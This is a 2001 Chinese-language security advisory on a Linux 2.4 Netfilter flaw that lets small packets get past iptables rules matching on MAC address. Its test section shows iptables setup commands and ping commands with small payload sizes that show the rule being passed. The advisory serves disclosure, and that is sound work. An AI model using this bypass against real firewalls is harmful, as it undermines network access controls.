Linux 2.4 内核MAC 模块过滤可旁路漏洞发布时间:2001-10-13 更新时间:2001-10-13 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 受影响系统 Linux kernel 2.4详细描述 Linux内核中的Netfilter功能中存在一个漏洞可以允许远程用户访问敏感系统。 通过发送碎片包到过滤了MAC地址模式匹配的过滤系统,就可能导致绕过系统过滤。 测试代码 victim# iptables -P INPUT ACCEPT victim# iptables -F INPUT victim# iptables -I INPUT -p icmp -m mac --mac-source AT:TA:CK:ER:00:00 -j DROP victim# iptables -L INPUT -v Chain INPUT (policy ACCEPT xxxx packets, xxxxxxx bytes) pkts bytes target prot opt in out source destination 0 0 DROP icmp -- any any anywhere anywhere MAC AT:TA:CK:ER:00:00 [note that the packet and byte counters are zero] On Attacker (assuming Attacker runs Linux or similar) attacker# ping -s 8 -c 1 Victim PING Victim (xx.xx.xx.xx) from xx.xx.xx.xx : 8(36) bytes of data. --- xx.xx.xx.xx ping statistics --- 1 packets transmitted, 0 packets received, 100% packet loss [the ping packets were dropped, correctly] On Victim again: victim# iptables -L INPUT -v Chain INPUT (policy ACCEPT 231 packets, 39475 bytes) pkts bytes target prot opt in out source destination 1 36 DROP icmp -- any any anywhere anywhere MAC 00:03:47:87:BA:C5 [note that the packet and byte counters have increased, the packet counter is showing 1 packet which is correct] Now back to Attacker: attacker# ping -s 4 -c 1 Victim PING Victim (xx.xx.xx.xx) from xx.xx.xx.xx : 4(32) bytes of data. 12 bytes from xx.xx.xx.xx: icmp_seq=0 ttl=255 --- xx.xx.xx.xx ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss [note that this time, the ping packet was replied to, not dropped by the rule] And finally, back to Victim: victim# iptables -L INPUT -v Chain INPUT (policy ACCEPT 231 packets, 39475 bytes) pkts bytes target prot opt in out source destination 1 32 DROP icmp -- any any anywhere anywhere MAC AT:TA:CK:ER:00:00 [note that the packet counters have not increased, the packet did not match the drop rule] 这会导致两种后果: 恶意用户能绕过 iptables 的基于 MAC 的丢包规则 如果 pnAnywhere 是通过 MAC 地址设立的,它可能会不正常工作 解决方案 尚无 相关信息 |
